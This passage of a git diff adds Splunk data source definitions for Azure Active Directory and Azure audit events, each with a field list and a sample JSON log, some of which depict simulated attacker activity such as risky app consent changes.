+  "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress":
+  "40.81.4.144", "roles": []}}, "targetResources": [{"id": "83a3158c-1d08-4686-b5f9-72fb34cb606e",
+  "displayName": "test", "type": "User", "userPrincipalName": "testuser@splunkresearch.com",
+  "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": [{"key":
+  "OnPremisesAgent", "value": "None"}]}}'
diff --git a/data_sources/azure_active_directory_set_domain_authentication.yml b/data_sources/azure_active_directory_set_domain_authentication.yml
new file mode 100644
index 0000000000..e8276c7521
--- /dev/null
+++ b/data_sources/azure_active_directory_set_domain_authentication.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Set domain authentication
+id: e7bcdab9-908c-40ab-ba38-5db54fa87750
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Set domain authentication
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-26T13:44:59.0372448Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Set domain authentication", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature":
+  "None", "durationMs": 0, "callerIpAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+  "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4", "Level": 4, "properties":
+  {"id": "Directory_57e60ecc-17b8-4ab5-815e-d538e1ca32a4_XDHHZ_434456733", "category":
+  "DirectoryManagement", "correlationId": "57e60ecc-17b8-4ab5-815e-d538e1ca32a4",
+  "result": "success", "resultReason": "", "activityDisplayName": "Add unverified
+  domain", "activityDateTime": "2023-07-26T13:44:59.0372448+00:00", "loggedByService":
+  "Core Directory", "operationType": "Add", "userAgent": null, "initiatedBy": {"user":
+  {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce", "displayName": null, "userPrincipalName":
+  "tommyr@splunkresearch.com", "ipAddress": "2601:646:a000:200:6419:f55c:946d:17d1",
+  "roles": []}}, "targetResources": [{"id": null, "displayName": "newdomain.com",
+  "modifiedProperties": [{"displayName": "Name", "oldValue": "[\"\"]", "newValue":
+  "[\"newdomain.com\"]"}, {"displayName": "LiveType", "oldValue": "[\"None\"]", "newValue":
+  "[\"Managed\"]"}, {"displayName": "Included Updated Properties", "oldValue": null,
+  "newValue": "\"Name,LiveType\""}], "administrativeUnits": []}], "additionalDetails":
+  [{"key": "User-Agent", "value": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
+  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"}]}}'
diff --git a/data_sources/azure_active_directory_sign_in_activity.yml b/data_sources/azure_active_directory_sign_in_activity.yml
new file mode 100644
index 0000000000..8f4d42c2e2
--- /dev/null
+++ b/data_sources/azure_active_directory_sign_in_activity.yml
@@ -0,0 +1,161 @@
+name: Azure Active Directory Sign-in activity
+id: f9ed0a3a-9e20-4198-a035-d0a29593fbe0
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Sign-in activity
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- identity
+- index
+- linecount
+- location
+- operationName
+- operationVersion
+- properties.alternateSignInName
+- properties.appDisplayName
+- properties.appId
+- properties.appServicePrincipalId
+- properties.authenticationDetails{}.RequestSequence
+- properties.authenticationDetails{}.StatusSequence
+- properties.authenticationDetails{}.authenticationMethod
+- properties.authenticationDetails{}.authenticationMethodDetail
+- properties.authenticationDetails{}.authenticationStepDateTime
+- properties.authenticationDetails{}.authenticationStepRequirement
+- properties.authenticationDetails{}.authenticationStepResultDetail
+- properties.authenticationDetails{}.succeeded
+- properties.authenticationProcessingDetails{}.key
+- properties.authenticationProcessingDetails{}.value
+- properties.authenticationProtocol
+- properties.authenticationRequirement
+- properties.authenticationRequirementPolicies{}.detail
+- properties.authenticationRequirementPolicies{}.requirementProvider
+- properties.autonomousSystemNumber
+- properties.clientAppUsed
+- properties.clientCredentialType
+- properties.conditionalAccessStatus
+- properties.correlationId
+- properties.createdDateTime
+- properties.crossTenantAccessType
+- properties.deviceDetail.deviceId
+- properties.deviceDetail.operatingSystem
+- properties.flaggedForReview
+- properties.homeTenantId
+- properties.id
+- properties.incomingTokenType
+- properties.ipAddress
+- properties.isInteractive
+- properties.isTenantRestricted
+- properties.location.city
+- properties.location.countryOrRegion
+- properties.location.geoCoordinates.latitude
+- properties.location.geoCoordinates.longitude
+- properties.location.state
+- properties.originalRequestId
+- properties.originalTransferMethod
+- properties.processingTimeInMilliseconds
+- properties.resourceDisplayName
+- properties.resourceId
+- properties.resourceServicePrincipalId
+- properties.resourceTenantId
+- properties.riskDetail
+- properties.riskLevelAggregated
+- properties.riskLevelDuringSignIn
+- properties.riskState
+- properties.rngcStatus
+- properties.servicePrincipalId
+- properties.signInIdentifier
+- properties.signInTokenProtectionStatus
+- properties.ssoExtensionVersion
+- properties.status.additionalDetails
+- properties.status.errorCode
+- properties.status.failureReason
+- properties.tenantId
+- properties.tokenIssuerName
+- properties.tokenIssuerType
+- properties.uniqueTokenIdentifier
+- properties.userAgent
+- properties.userDisplayName
+- properties.userId
+- properties.userPrincipalName
+- properties.userType
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- resultType
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-10-24T20:13:31.4449614Z", "resourceId": "/tenants/887c9144-28b8-431b-885b-764fdeefcf62/providers/Microsoft.aadiam",
+  "operationName": "Sign-in activity", "operationVersion": "1.0", "category": "SignInLogs",
+  "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "resultType": "50076", "resultSignature":
+  "None", "resultDescription": "Due to a configuration change made by your administrator,
+  or because you moved to a new location, you must use multi-factor authentication
+  to access the resource.", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId":
+  "1f577997-0710-4bd4-848e-5854f748f7dc", "identity": "user15", "Level": 4, "location":
+  "US", "properties": {"id": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "createdDateTime":
+  "2023-10-24T20:01:11.9490387+00:00", "userDisplayName": "user15", "userPrincipalName":
+  "user15@splunkresearch.onmicrosoft.com", "userId": "57e4bd36-9722-4a4a-9729-7203d8e00b72",
+  "appId": "1b730954-1685-4b74-9bfd-dac224a7b894", "appDisplayName": "Azure Active
+  Directory PowerShell", "ipAddress": "1.2.3.4", "status": {"errorCode": 50076, "failureReason":
+  "Due to a configuration change made by your administrator, or because you moved
+  to a new location, you must use multi-factor authentication to access the resource.",
+  "additionalDetails": "MFA required in Azure AD"}, "clientAppUsed": "Mobile Apps
+  and Desktop clients", "userAgent": "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
+  WindowsPowerShell/5.1.22621.2428", "deviceDetail": {"deviceId": "", "operatingSystem":
+  "Windows"}, "location": {"city": "Rochester", "state": "New York", "countryOrRegion":
+  "US", "geoCoordinates": {"latitude": 20.756160123483984, "longitude": -73.99697875976562}},
+  "mfaDetail": {}, "correlationId": "1f577997-0710-4bd4-848e-5854f748f7dc", "conditionalAccessStatus":
+  "notApplied", "appliedConditionalAccessPolicies": [], "authenticationContextClassReferences":
+  [], "originalRequestId": "22608a25-1d9b-44b5-b0f2-cb94f06b2d00", "isInteractive":
+  true, "tokenIssuerName": "", "tokenIssuerType": "AzureAD", "authenticationProcessingDetails":
+  [{"key": "Legacy TLS (TLS 1.0, 1.1, 3DES)", "value": "False"}, {"key": "Is CAE Token",
+  "value": "False"}], "networkLocationDetails": [], "clientCredentialType": "none",
+  "processingTimeInMilliseconds": 72, "riskDetail": "none", "riskLevelAggregated":
+  "none", "riskLevelDuringSignIn": "none", "riskState": "none", "riskEventTypes":
+  [], "riskEventTypes_v2": [], "resourceDisplayName": "Windows Azure Active Directory",
+  "resourceId": "00000002-0000-0000-c000-000000000000", "resourceTenantId": "887c9144-28b8-431b-885b-764fdeefcf62",
+  "homeTenantId": "887c9144-28b8-431b-885b-764fdeefcf62", "tenantId": "887c9144-28b8-431b-885b-764fdeefcf62",
+  "authenticationDetails": [{"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00",
+  "authenticationMethod": "Password", "authenticationMethodDetail": "Password in the
+  cloud", "succeeded": true, "authenticationStepResultDetail": "Correct password",
+  "authenticationStepRequirement": "Primary authentication", "StatusSequence": 0,
+  "RequestSequence": 1}, {"authenticationStepDateTime": "2023-10-24T20:01:11.9490387+00:00",
+  "succeeded": false, "authenticationStepResultDetail": "MFA required in Azure AD",
+  "authenticationStepRequirement": "Primary authentication"}], "authenticationRequirementPolicies":
+  [{"requirementProvider": "user", "detail": "Per-user MFA"}], "sessionLifetimePolicies":
+  [], "authenticationRequirement": "multiFactorAuthentication", "alternateSignInName":
+  "user15@splunkresearch.onmicrosoft.com", "signInIdentifier": "user15@splunkresearch.onmicrosoft.com",
+  "servicePrincipalId": "", "userType": "Member", "flaggedForReview": false, "isTenantRestricted":
+  false, "autonomousSystemNumber": 12271, "crossTenantAccessType": "none", "privateLinkDetails":
+  {}, "ssoExtensionVersion": "", "uniqueTokenIdentifier": "JYpgIpsdtUSw8suU8GstAA",
+  "authenticationStrengths": [], "incomingTokenType": "none", "authenticationProtocol":
+  "ropc", "appServicePrincipalId": null, "resourceServicePrincipalId": "56ad242f-e13b-47fc-8de8-19e3bf6f6575",
+  "rngcStatus": 0, "signInTokenProtectionStatus": "none", "originalTransferMethod":
+  "none"}}'
diff --git a/data_sources/azure_active_directory_update_application.yml b/data_sources/azure_active_directory_update_application.yml
new file mode 100644
index 0000000000..6f09efb5bc
--- /dev/null
+++ b/data_sources/azure_active_directory_update_application.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Update application
+id: 2c08188a-ba25-496e-87c7-803cf28b6c90
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Update application
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2024-01-29T21:31:03.0102031Z", "resourceId": "/tenants/75243ab2-44f8-435c-a7a6-b479385df6d4/providers/Microsoft.aadiam",
+  "operationName": "Update application", "operationVersion": "1.0", "category": "AuditLogs",
+  "tenantId": "75243ab2-44f8-435c-a7a6-b479385df6d4", "resultSignature": "None", "durationMs":
+  0, "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3", "Level": 4, "properties":
+  {"id": "Directory_a5396d2b-fcf6-41e7-9219-c6239f1298e3_DGBDP_1548236", "category":
+  "ApplicationManagement", "correlationId": "a5396d2b-fcf6-41e7-9219-c6239f1298e3",
+  "result": "success", "resultReason": "", "activityDisplayName": "Update application",
+  "activityDateTime": "2024-01-29T21:31:03.0102031+00:00", "loggedByService": "Core
+  Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+  {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName":
+  "user30@splunkresearch.onmicrosoft.com", "ipAddress": "", "roles": []}}, "targetResources":
+  [{"id": "75924835-d844-4947-96ba-18074e997386", "displayName": "MaliciousApp", "type":
+  "Application", "modifiedProperties": [{"displayName": "RequiredResourceAccess",
+  "oldValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]",
+  "newValue": "[{\"ResourceAppId\":\"00000003-0000-0000-c000-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"570282fd-fa5c-430d-a7fd-fc8dc98a9dca\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"7427e0e9-2fba-42fe-b0c0-848c9e6a8182\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\"DirectAccessGrant\":false,\"ImpersonationAccessGrants\":[20]},{\"EntitlementId\":\"810c84a8-4a9e-49e6-bf7d-12d183f40d01\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1},{\"ResourceAppId\":\"00000002-0000-0ff1-ce00-000000000000\",\"RequiredAppPermissions\":[{\"EntitlementId\":\"dc890d15-9560-4a4c-9b7f-a736ec74ec40\",\"DirectAccessGrant\":true,\"ImpersonationAccessGrants\":[]}],\"EncodingVersion\":1}]"},
+  {"displayName": "Included Updated Properties", "oldValue": null, "newValue": "\"RequiredResourceAccess\""}],
+  "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
+  Gecko) Chrome/120.0.0.0 Safari/537.36"}, {"key": "AppId", "value": "867f0d29-0eab-4017-b691-c4713cc7d7b0"}]}}'
diff --git a/data_sources/azure_active_directory_update_authorization_policy.yml b/data_sources/azure_active_directory_update_authorization_policy.yml
new file mode 100644
index 0000000000..564ac6d8fa
--- /dev/null
+++ b/data_sources/azure_active_directory_update_authorization_policy.yml
@@ -0,0 +1,84 @@
+name: Azure Active Directory Update authorization policy
+id: c5b7ffcd-73d8-4fe5-afd8-b1218d715c0c
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Update authorization policy
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-10-26T19:22:20.2814027Z", "resourceId": "/tenants/5f210575-a69b-41a7-b623-3f6d79ccd432/providers/Microsoft.aadiam",
+  "operationName": "Update authorization policy", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "5f210575-a69b-41a7-b623-3f6d79ccd432", "resultSignature":
+  "None", "durationMs": 0, "callerIpAddress": "1.2.3.4", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065",
+  "Level": 4, "properties": {"id": "Directory_cc46d719-4c0f-4b78-8795-b0d6ca5b2065_6CH7M_196574953",
+  "category": "AuthorizationPolicy", "correlationId": "cc46d719-4c0f-4b78-8795-b0d6ca5b2065",
+  "result": "success", "resultReason": "", "activityDisplayName": "Update authorization
+  policy", "activityDateTime": "2023-10-26T19:22:20.2814027+00:00", "loggedByService":
+  "Core Directory", "operationType": "Update", "userAgent": null, "initiatedBy": {"user":
+  {"id": "e4c722ac-3b83-478d-8f52-c388885dc30f", "displayName": null, "userPrincipalName":
+  "attacker@splunkresearch.onmicrosoft.com", "ipAddress": "1.2.3.4", "roles": []}},
+  "targetResources": [{"id": "24484114-1daa-4700-aaf7-44ee5cbe5678", "displayName":
+  "Authorization Policy", "type": "Other", "modifiedProperties": [{"displayName":
+  "AllowUserConsentForRiskyApps", "oldValue": "[false]", "newValue": "[true]"}, {"displayName":
+  "PermissionGrantPolicyIdsAssignedToDefaultUserRole", "oldValue": "[\"ManagePermissionGrantsForSelf.microsoft-user-default-legacy\"]",
+  "newValue": "[\"microsoft-user-default-legacy\"]"}, {"displayName": "Included Updated
+  Properties", "oldValue": null, "newValue": "\"AllowUserConsentForRiskyApps, PermissionGrantPolicyIdsAssignedToDefaultUserRole\""}],
+  "administrativeUnits": []}], "additionalDetails": [{"key": "User-Agent", "value":
+  "Swagger-Codegen/1.0.0.0/csharp/msal"}]}}'
diff --git a/data_sources/azure_active_directory_update_user.yml b/data_sources/azure_active_directory_update_user.yml
new file mode 100644
index 0000000000..5d26614a9b
--- /dev/null
+++ b/data_sources/azure_active_directory_update_user.yml
@@ -0,0 +1,83 @@
+name: Azure Active Directory Update user
+id: 5495c90a-047c-4b8e-b2fe-1db6282d3872
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory Update user
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.additionalDetails{}.key
+- properties.additionalDetails{}.value
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.modifiedProperties{}.displayName
+- properties.targetResources{}.modifiedProperties{}.newValue
+- properties.targetResources{}.modifiedProperties{}.oldValue
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-07-24T14:28:15.2233481Z", "resourceId": "/tenants/fc69e276-e9e8-4af9-9002-1e410d77244e/providers/Microsoft.aadiam",
+  "operationName": "Update user", "operationVersion": "1.0", "category": "AuditLogs",
+  "tenantId": "fc69e276-e9e8-4af9-9002-1e410d77244e", "resultSignature": "None", "durationMs":
+  0, "callerIpAddress": "2601:646:a000:200:b0ee:600c:de8a:c7d5", "correlationId":
+  "d34f6d2e-3120-4b96-b922-e06090f6a497", "Level": 4, "properties": {"id": "Directory_d34f6d2e-3120-4b96-b922-e06090f6a497_VPRLA_316413199",
+  "category": "UserManagement", "correlationId": "d34f6d2e-3120-4b96-b922-e06090f6a497",
+  "result": "success", "resultReason": "", "activityDisplayName": "Update user", "activityDateTime":
+  "2023-07-24T14:28:15.2233481+00:00", "loggedByService": "Core Directory", "operationType":
+  "Update", "userAgent": null, "initiatedBy": {"user": {"id": "728989f4-eb3d-45c2-8741-2f2af4e485ce",
+  "displayName": null, "userPrincipalName": "tommyr@splunkresearch.com", "ipAddress":
+  "2601:646:a000:200:b0ee:600c:de8a:c7d5", "roles": []}}, "targetResources": [{"id":
+  "83a3158c-1d08-4686-b5f9-72fb34cb606e", "displayName": null, "type": "User", "userPrincipalName":
+  "testuser@splunkresearch.com", "modifiedProperties": [{"displayName": "AccountEnabled",
+  "oldValue": "[false]", "newValue": "[true]"}, {"displayName": "Included Updated
+  Properties", "oldValue": null, "newValue": "\"AccountEnabled\""}, {"displayName":
+  "TargetId.UserType", "oldValue": null, "newValue": "\"Member\""}], "administrativeUnits":
+  []}], "additionalDetails": [{"key": "UserType", "value": "Member"}]}}'
diff --git a/data_sources/azure_active_directory_user_registered_security_info.yml b/data_sources/azure_active_directory_user_registered_security_info.yml
new file mode 100644
index 0000000000..9d5329b76d
--- /dev/null
+++ b/data_sources/azure_active_directory_user_registered_security_info.yml
@@ -0,0 +1,78 @@
+name: Azure Active Directory User registered security info
+id: b63240de-8a01-4ba8-8987-89d18d4b375d
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Active Directory User registered security
+  info
+source: Azure AD
+sourcetype: azure:monitor:aad
+separator: operationName
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- Level
+- callerIpAddress
+- category
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- durationMs
+- host
+- index
+- linecount
+- operationName
+- operationVersion
+- properties.activityDateTime
+- properties.activityDisplayName
+- properties.category
+- properties.correlationId
+- properties.id
+- properties.initiatedBy.user.displayName
+- properties.initiatedBy.user.id
+- properties.initiatedBy.user.ipAddress
+- properties.initiatedBy.user.userPrincipalName
+- properties.loggedByService
+- properties.operationType
+- properties.result
+- properties.resultReason
+- properties.targetResources{}.displayName
+- properties.targetResources{}.id
+- properties.targetResources{}.type
+- properties.targetResources{}.userPrincipalName
+- properties.userAgent
+- punct
+- resourceId
+- resultDescription
+- resultSignature
+- source
+- sourcetype
+- splunk_server
+- tenantId
+- time
+- timeendpos
+- timestartpos
+example_log: '{"time": "2023-01-30T21:11:30.8690619Z", "resourceId": "/tenants/91da745f-8abb-4a7d-ba94-5667c6f9e01a/providers/Microsoft.aadiam",
+  "operationName": "User registered security info", "operationVersion": "1.0", "category":
+  "AuditLogs", "tenantId": "91da745f-8abb-4a7d-ba94-5667c6f9e01a", "resultSignature":
+  "None", "resultDescription": "User registered App Password", "durationMs": 0, "callerIpAddress":
+  "72.1.2.43", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79", "Level": 4,
+  "properties": {"id": "IAMUX_14279c94-7ebc-409f-be4e-7861f13c8a79_K2ATV_323947358",
+  "category": "UserManagement", "correlationId": "14279c94-7ebc-409f-be4e-7861f13c8a79",
+  "result": "success", "resultReason": "User registered App Password", "activityDisplayName":
+  "User registered security info", "activityDateTime": "2023-01-30T21:11:30.8690619+00:00",
+  "loggedByService": "Authentication Methods", "operationType": "Add", "userAgent":
+  null, "initiatedBy": {"user": {"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998", "displayName":
+  null, "userPrincipalName": "User30@splunkresearch.com", "ipAddress": "72.1.2.43",
+  "roles": []}}, "targetResources": [{"id": "40b61050-e814-4ae5-8ffe-66b6f0c53998",
+  "displayName": "User30", "type": "User", "userPrincipalName": "User30@splunkresearch.com",
+  "modifiedProperties": [], "administrativeUnits": []}], "additionalDetails": []}}'
diff --git a/data_sources/azure_audit_create_or_update_an_azure_automation_account.yml b/data_sources/azure_audit_create_or_update_an_azure_automation_account.yml
new file mode 100644
index 0000000000..4d8f8966a3
--- /dev/null
+++ b/data_sources/azure_audit_create_or_update_an_azure_automation_account.yml
@@ -0,0 +1,135 @@
+name: Azure Audit Create or Update an Azure Automation account
+id: 2ab182e7-feda-4249-9418-32710b55a885
+version: 1
+date: '2024-07-18'
+author: Patrick Bareiss, Splunk
+description: Data source object for Azure Audit Create or Update an Azure Automation
+  account
+source: mscs:azure:audit
+sourcetype: mscs:azure:audit
+separator: operationName.localizedValue
+supported_TA:
+- name: Splunk Add-on for Microsoft Cloud Services
+  url: https://splunkbase.splunk.com/app/3110
+  version: 5.2.2
+fields:
+- _time
+- authorization.action
+- authorization.scope
+- caller
+- channels
+- claims.aio
+- claims.altsecid
+- claims.appid
+- claims.appidacr
+- claims.aud
+- claims.exp
+- claims.groups
+- claims.http://schemas.microsoft.com/claims/authnclassreference
+- claims.http://schemas.microsoft.com/claims/authnmethodsreferences
+- claims.http://schemas.microsoft.com/identity/claims/identityprovider
+- claims.http://schemas.microsoft.com/identity/claims/objectidentifier
+- claims.http://schemas.microsoft.com/identity/claims/scope
+- claims.http://schemas.microsoft.com/identity/claims/tenantid
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
+- claims.http://schemas.xmlsoap.org/ws/2005/05/identity/claims/surname
+- claims.iat
+- claims.ipaddr
+- claims.iss
+- claims.name
+- claims.nbf
+- claims.puid
+- claims.rh
+- claims.uti
+- claims.ver
+- claims.wids
+- claims.xms_tcdt
+- correlationId
+- date_hour
+- date_mday
+- date_minute
+- date_month
+- date_second
+- date_wday
+- date_year
+- date_zone
+- dest
+- dvc
+- eventDataId
+- eventName.localizedValue
+- eventName.value
+- eventSource.localizedValue
+- eventSource.value
+- eventTimestamp
+- host
+- id
+- index
+- level
+- linecount
+- object
+- object_id
+- object_path
+- operationId
+- operationName.localizedValue
+- operationName.value
+- product
+- properties.entity
+- properties.eventCategory
+- properties.hierarchy
+- properties.message
+- punct
+- resourceGroupName
+- resourceProviderName.localizedValue
+- resourceProviderName.value
+- resourceUri
+- source
+- sourcetype
+- splunk_server
+- status
+- status.localizedValue
+- status.value
+- subStatus.value
+- submissionTimestamp
+- subscriptionId
+- timeendpos
+- timestartpos
+- user
+- user_name
+- vendor
+- vendor_product
+- vendor_res_code
+example_log: '{"authorization": {"action": "Microsoft.Automation/automationAccounts/write",
+  "scope": "/subscriptions/67165197-75ea-4ca3-96a5-3e23868eacd0/resourcegroups/ResourceGroup1/providers/Microsoft.Automation/automationAccounts/TestAutomationAccount"},
+  "caller": "evilAdmin@contoso.com", "channels": "Operation", "claims": {"aud": "https://management.core.windows.net/",
+  "iss": "https://sts.windows.net/ad251139-d600-4f45-a8ba-9f6ca1e5a93d/", "iat": "1661179930",
+  "nbf": "1661179930", "exp": "1661185179", "http://schemas.microsoft.com/claims/authnclassreference":
+  "1", "aio": "AWQAm/8TAAAATFEszAxfULi02mHZwJPr322a2w4m7xjhs9xgc61bVQITM6lcvJI17c8SKQGIWgIA0FysfS1bmLHdxImNfT26qJ5Sfc5UdTncHkz3UYu+AvgCW1gg1mRxOZEFXYdIlQ/h",
+  "altsecid": "1:live.com:000161008492EF5F", "http://schemas.microsoft.com/claims/authnmethodsreferences":
